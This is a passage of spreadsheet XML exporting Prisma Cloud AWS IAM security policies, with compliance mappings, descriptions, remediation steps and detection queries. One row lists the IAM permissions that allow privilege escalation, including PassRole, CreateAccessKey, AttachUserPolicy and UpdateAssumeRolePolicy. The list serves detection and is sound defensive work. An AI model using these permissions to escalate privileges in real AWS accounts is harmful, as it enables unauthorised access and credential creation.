          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S1955" t="inlineStr"/>
      <c r="T1955" t="b">
        <v>0</v>
      </c>
      <c r="U1955" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1955" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1955" t="inlineStr">
        <is>
          <t>This policy identifies ECS IAM policies that are overly permissive to all traffic. It is recommended that the ECS should be granted access restrictions so that only authorized users and applications have access to the service.
For more details:
https://docs.aws.amazon.com/AmazonECS/latest/userguide/security_iam_id-based-policy-examples.html#security_iam_service-with-iam-policy-best-practices</t>
        </is>
      </c>
      <c r="X1955" t="inlineStr">
        <is>
          <t>1. Login to AWS console
2. Goto IAM Services
3. Click on 'Policies' in left hand panel
4. Search for the Policy for which the Alert is generated and click on it
5. Under Permissions tab, click on Edit policy
6. Under the Visual editor, for each of the 'ECS' Service, click to expand and perform following.
6.a. Click to expand 'Request conditions'
6.b. Under the 'Source IP', remove the row with the entry '0.0.0.0/0' or '::/0'. Add condition with restrictive IP ranges.
7. Click on Review policy and Save changes.</t>
        </is>
      </c>
      <c r="Y1955" t="inlineStr"/>
      <c r="Z1955" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-policy-version' AND json.rule = isAttached is true and document.Statement[?any((Condition.ForAnyValue:IpAddress.aws:SourceIp contains 0.0.0.0/0 or Condition.IpAddress.aws:SourceIp contains 0.0.0.0/0 or Condition.IpAddress.aws:SourceIp contains ::/0 or Condition.ForAnyValue:IpAddress.aws:SourceIp contains ::/0) and Effect equals Allow and Action anyStartWith ecs:)] exists</t>
        </is>
      </c>
      <c r="AA1955" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1955" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1955" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-719</t>
        </is>
      </c>
      <c r="AD1955" t="b">
        <v>1</v>
      </c>
      <c r="AE1955" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1955" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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5" t="inlineStr">
        <is>
          <t>d7d6f3d1-8e0e-4464-b3bc-08f9f7076615</t>
        </is>
      </c>
      <c r="AI1955" t="inlineStr">
        <is>
          <t>8a205996-70d1-452c-b9da-c229e9275b00</t>
        </is>
      </c>
      <c r="AJ1955" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1955" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1956">
      <c r="A1956" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO 27002:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CSA CCM v4.0.12,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kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Australian Energy Sector Cyber Security Framework (AESCSF), Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), Copy of CIS Controls v8, CRI Profile v1.2.1, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, CSA CCM v4.0.12, CSA CCM v4.0.12, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1956" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1956" s="2" t="inlineStr"/>
      <c r="D1956" t="n">
        <v>0</v>
      </c>
      <c r="E1956" t="n">
        <v>263</v>
      </c>
      <c r="F1956" t="n">
        <v>0</v>
      </c>
      <c r="G1956" t="b">
        <v>1</v>
      </c>
      <c r="H19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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1956" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1956" t="inlineStr">
        <is>
          <t>AWS IAM Policy permission may cause privilege escalation</t>
        </is>
      </c>
      <c r="L1956" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1956" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1956" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1956" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1956" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1956" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1956" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1956" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1956" t="b">
        <v>0</v>
      </c>
      <c r="U1956" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1956" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1956" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM Policy which have permission that may cause privilege escalation. AWS IAM policy having weak permissions could be exploited by an attacker to elevate privileges. It is recommended to follow the principle of least privileges ensuring that AWS IAM policy does not have these sensitive permissions.</t>
        </is>
      </c>
      <c r="X1956" t="inlineStr">
        <is>
          <t>Refer to the following URL to remove below listed weak permissions from reported AWS IAM Policies,
https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_manage-attach-detach.html#remove-policies-console
Below are the permission which can lead to privilege escalation,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iam:* 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-286
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-286</t>
        </is>
      </c>
      <c r="Y1956" t="inlineStr"/>
      <c r="Z1956" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-iam-get-policy-version' AND json.rule = isAttached is true and document.Statement[?any(Effect equals Allow and (Action contains iam:CreatePolicyVersion or Action contains iam:SetDefaultPolicyVersion or Action contains iam:PassRole or Action contains iam:CreateAccessKey or Action contains iam:CreateLoginProfile or Action contains iam:UpdateLoginProfile or Action contains iam:AttachUserPolicy or Action contains iam:AttachGroupPolicy or Action contains iam:AttachRolePolicy or Action contains iam:PutUserPolicy or Action contains iam:PutGroupPolicy or Action contains iam:PutRolePolicy or Action contains iam:AddUserToGroup or Action contains iam:UpdateAssumeRolePolicy or Action contains iam:*))] exists
{"category":"IAM","resourceTypes":["aws_iam_policy"]}</t>
        </is>
      </c>
      <c r="AA1956" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1956" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1956" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-873-CKV_AWS_286</t>
        </is>
      </c>
      <c r="AD1956" t="b">
        <v>1</v>
      </c>
      <c r="AE1956" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1956" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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6" t="inlineStr">
        <is>
          <t>6abcb8b7-f34a-4d8d-8228-486f9e284cda</t>
        </is>
      </c>
      <c r="AI1956" t="inlineStr">
        <is>
          <t>3d208afd-8254-4649-861b-34e563fbcb7f</t>
        </is>
      </c>
      <c r="AJ1956" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1956" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1957">
      <c r="A1957" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO 27002:2022, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2,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NIST 800-53 Rev 5, CSA CCM v4.0.12,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kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Copy of CIS Controls v8, CRI Profile v1.2.1, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, SOC 2, SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, CSA CCM v4.0.12, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1957" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1957" s="2" t="inlineStr"/>
      <c r="D1957" t="inlineStr"/>
      <c r="E1957" t="inlineStr"/>
      <c r="F1957" t="inlineStr"/>
      <c r="G1957" t="b">
        <v>1</v>
      </c>
      <c r="H19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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1957" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1957" t="inlineStr">
        <is>
          <t>AWS IAM policy overly permissive to Lambda service</t>
        </is>
      </c>
      <c r="L1957" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1957" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1957" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1957" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1957" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1957" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1957" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1957" t="inlineStr"/>
      <c r="T1957" t="b">
        <v>0</v>
      </c>
      <c r="U1957" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1957" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1957" t="inlineStr">
        <is>
          <t>This policy identifies the IAM policies that are overly permissive to Lambda service. AWS provides serverless computational functionality through their Lambda service. Serverless functions allow organizations to run code for applications or backend services without provisioning virtual machines or management servers. It is recommended to follow the principle of least privileges, ensuring that only restricted Lambda services for restricted resources.</t>
        </is>
      </c>
      <c r="X1957" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. Navigate to the 'IAM' service
3. Click on the 'Policies' in left hand panel and Click on the reported IAM policy
4. Under Permissions tab, Change the element of the policy document to be more restrictive so that it only allows restricted Lambda permissions on selected resources instead of wildcards (Lambda:* and Resource:*) OR Put condition statement with least privilege access.</t>
        </is>
      </c>
      <c r="Y1957" t="inlineStr"/>
      <c r="Z1957" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-iam-get-policy-version' AND json.rule = isAttached is true and document.Statement[?any(Effect equals Allow and (Action equals lambda:* or Action[*] equals lambda:*) and (Resource equals * or Resource[*] equals *) and Condition does not exist)] exists</t>
        </is>
      </c>
      <c r="AA1957" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1957" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1957" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-879</t>
        </is>
      </c>
      <c r="AD1957" t="b">
        <v>1</v>
      </c>
      <c r="AE1957" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1957" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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7" t="inlineStr">
        <is>
          <t>c4f6ac9d-03d5-4bf2-b4ea-bc5c24057628</t>
        </is>
      </c>
      <c r="AI1957" t="inlineStr">
        <is>
          <t>a5e1c25d-001f-4489-993b-68d63d71754c</t>
        </is>
      </c>
      <c r="AJ1957" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1957" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1958">
      <c r="A1958" t="inlineStr">
        <is>
          <t>wells fargo CIS v1.5.0 (AWS) - Level 1, APRA (CPS 234) Information Security, CIS v1.2.0 (AWS), CIS v3.0.0 (AWS) Level 1, HIPAA, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, Demo_Daryl ACSC Information Security Manual (ISM), ISO 27002:2022, Fedramp (Moderate), ISO/IEC 27002:2013, NIST CSF, APRA (CPS 234) Information Security, NIST 800-53 Rev 5, CIS Controls v8.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, NIST 800-53 Rev 5, APRA (CPS 234) Information Security, Australian Energy Sector Cyber Security Framework (AESCSF), CIS Controls v8, SOC 2, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, NIST SP 800-172, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, MAS TRM 2021, PCI DSS v4.0, Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, PCI DSS v3.2.1, ISO/IEC 27001:2022, Risk Management in Technology (RMiT), MLPS 2.0 (Level 2), ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v1.3.0 (AWS), SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, FFIEC, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, MTSBv2_AWS, AWS Well-Architected Framework, ITSG-33, HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev4, CIS v1.4.0 (AWS), GDPR, ISO/IEC 27018:2019, SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS Controls v8.1, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, NIST 800-53 Rev 5, TX-RAMP Level 2, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Brazilian Data Protection Law (LGPD), CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, CIS v2.0.0 (AWS) - Level 1, Brazilian Data Protection Law (LGPD), PCI DSS v4.0, Copy of CIS Controls v8, CIS v1.5.0 (AWS) - Level 1, CIS Controls v7.1, PCI DSS v3.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1958" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1958" s="2" t="inlineStr"/>
      <c r="D1958" t="inlineStr"/>
      <c r="E1958" t="inlineStr"/>
      <c r="F1958" t="inlineStr"/>
      <c r="G1958" t="b">
        <v>1</v>
      </c>
      <c r="H19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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1958" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1958" t="inlineStr">
        <is>
          <t>AWS IAM support access policy is not associated to any role</t>
        </is>
      </c>
      <c r="L1958" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M1958" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1958" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1958" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1958" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1958" t="inlineStr">
        <is>
          <t>CIS Control 17</t>
        </is>
      </c>
      <c r="R1958" t="inlineStr">
        <is>
          <t>17.1</t>
        </is>
      </c>
      <c r="S1958" t="inlineStr"/>
      <c r="T1958" t="b">
        <v>0</v>
      </c>
      <c r="U1958" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1958" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1958" t="inlineStr">
        <is>
          <t>This policy identifies IAM policies with support role access which are not attached to any role for an account. AWS provides a support centre that can be used for incident notification and response, as well as technical support and customer services.</t>
        </is>
      </c>
      <c r="X1958" t="inlineStr">
        <is>
          <t>1. Log in to AWS console
2.Go to service IAM under Services panel.
3.From left panel click on 'Policies'
4.Search for the existence of a support policy 'AWSSupportAccess'
5.Create a IAM role 
6.Attach 'AWSSupportAccess' managed policy to the created IAM role</t>
        </is>
      </c>
      <c r="Y1958" t="inlineStr"/>
      <c r="Z1958" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-policy-version' AND json.rule = 'policyName equals AWSSupportAccess and policyArn contains arn:aws:iam::aws:policy/AWSSupportAccess and (isAttached is false or (isAttached is true and entities.policyRoles[*].roleId is empty))'</t>
        </is>
      </c>
      <c r="AA1958" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1958" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1958" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-485</t>
        </is>
      </c>
      <c r="AD1958" t="b">
        <v>1</v>
      </c>
      <c r="AE1958" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1958" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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8" t="inlineStr">
        <is>
          <t>0425bd06-9799-4d6b-8887-7f7304820424</t>
        </is>
      </c>
      <c r="AI1958" t="inlineStr">
        <is>
          <t>1ec24666-fffe-40e7-b293-96190e67b158</t>
        </is>
      </c>
      <c r="AJ1958" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1958" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1959">
      <c r="A1959" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, ACSC Information Security Manual (ISM), Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, CSA CCM v4.0.12,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Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, kfirdaus AWS Account-CS, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, SOC 2, kashan ACSC Information Security Manual (ISM), SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, AWS Well-Architected Framework, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), CSA CCM v4.0.12, kfirdaus AWS Account-CS, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1959" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1959" s="2" t="inlineStr"/>
      <c r="D1959" t="inlineStr"/>
      <c r="E1959" t="inlineStr"/>
      <c r="F1959" t="inlineStr"/>
      <c r="G1959" t="b">
        <v>1</v>
      </c>
      <c r="H19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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1959" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1959" t="inlineStr">
        <is>
          <t>AWS IAM policy is overly permissive to all traffic via condition clause</t>
        </is>
      </c>
      <c r="L1959" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1959" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1959" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1959" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1959" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1959" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1959" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S1959" t="inlineStr"/>
      <c r="T1959" t="b">
        <v>0</v>
      </c>
      <c r="U1959" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1959" t="inlineStr">
        <is>
          <t>aws-iam-get-policy-version</t>
        </is>
      </c>
      <c r="W1959" t="inlineStr">
        <is>
          <t>This policy identifies IAM policies that have a policy that is overly permissive to all traffic via condition clause. If any IAM policy statement with a condition containing 0.0.0.0/0 or ::/0, it allows all traffic to resources attached to that IAM policy. It is highly recommended to have the least privileged IAM policy to protect the data leakage and unauthorized access.</t>
        </is>
      </c>
      <c r="X1959" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. Navigate to the IAM dashboard
3. Click on 'Policies' in left hand panel
4. Search for the Policy for which the alert is generated and click on it.
5. Under the Permissions tab, click on Edit policy
6. Under the Visual editor, click to expand and perform following;
a. Click to expand 'Request conditions'
b. Under the 'Source IP', remove the row with the entry '0.0.0.0/0' or '::/0'. Add condition with restrictive IP ranges.
7. Click on Review policy and Save changes.</t>
        </is>
      </c>
      <c r="Y1959" t="inlineStr"/>
      <c r="Z1959" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-policy-version' AND json.rule = document.Statement[?any((Condition.ForAnyValue:IpAddress.aws:SourceIp contains 0.0.0.0/0 or Condition.IpAddress.aws:SourceIp contains 0.0.0.0/0 or Condition.IpAddress.aws:SourceIp contains ::/0 or Condition.ForAnyValue:IpAddress.aws:SourceIp contains ::/0) and Effect equals Allow and Action contains *)] exists</t>
        </is>
      </c>
      <c r="AA1959" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1959" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1959" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-693</t>
        </is>
      </c>
      <c r="AD1959" t="b">
        <v>1</v>
      </c>
      <c r="AE1959" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1959" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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59" t="inlineStr">
        <is>
          <t>e575091e-cf1b-48b1-9b6c-f4831568d59f</t>
        </is>
      </c>
      <c r="AI1959" t="inlineStr">
        <is>
          <t>970a9e6d-f02f-474e-b13c-268b3a1f7d2e</t>
        </is>
      </c>
      <c r="AJ1959" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1959" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1960">
      <c r="A1960" t="inlineStr"/>
      <c r="B1960" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1960" s="2" t="inlineStr"/>
      <c r="D1960" t="inlineStr"/>
      <c r="E1960" t="inlineStr"/>
      <c r="F1960" t="inlineStr"/>
      <c r="G1960" t="b">
        <v>0</v>
      </c>
      <c r="H19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 testrule, testrule2</t>
        </is>
      </c>
      <c r="I1960" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1960" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1960" t="inlineStr">
        <is>
          <t>vstoyko-test-AP</t>
        </is>
      </c>
      <c r="L1960" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1960" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1960" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1960" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1960" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1960" t="inlineStr"/>
      <c r="R1960" t="inlineStr"/>
      <c r="S1960" t="inlineStr">
        <is>
          <t>Test NW</t>
        </is>
      </c>
      <c r="T1960" t="b">
        <v>0</v>
      </c>
      <c r="U1960" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1960" t="inlineStr">
        <is>
          <t>aws-iam-list-access-keys</t>
        </is>
      </c>
      <c r="W1960" t="inlineStr">
        <is>
          <t>test</t>
        </is>
      </c>
      <c r="X1960" t="inlineStr"/>
      <c r="Y1960" t="inlineStr"/>
      <c r="Z1960" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-iam-list-access-keys' ) AND finding.name IN ('AWS EC2 instance with the creation of a new Group with attached policy permission')</t>
        </is>
      </c>
      <c r="AA1960" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1960" t="inlineStr">
        <is>
          <t>2024-09-13 17:16:53</t>
        </is>
      </c>
      <c r="AC1960" t="inlineStr"/>
      <c r="AD1960" t="b">
        <v>0</v>
      </c>
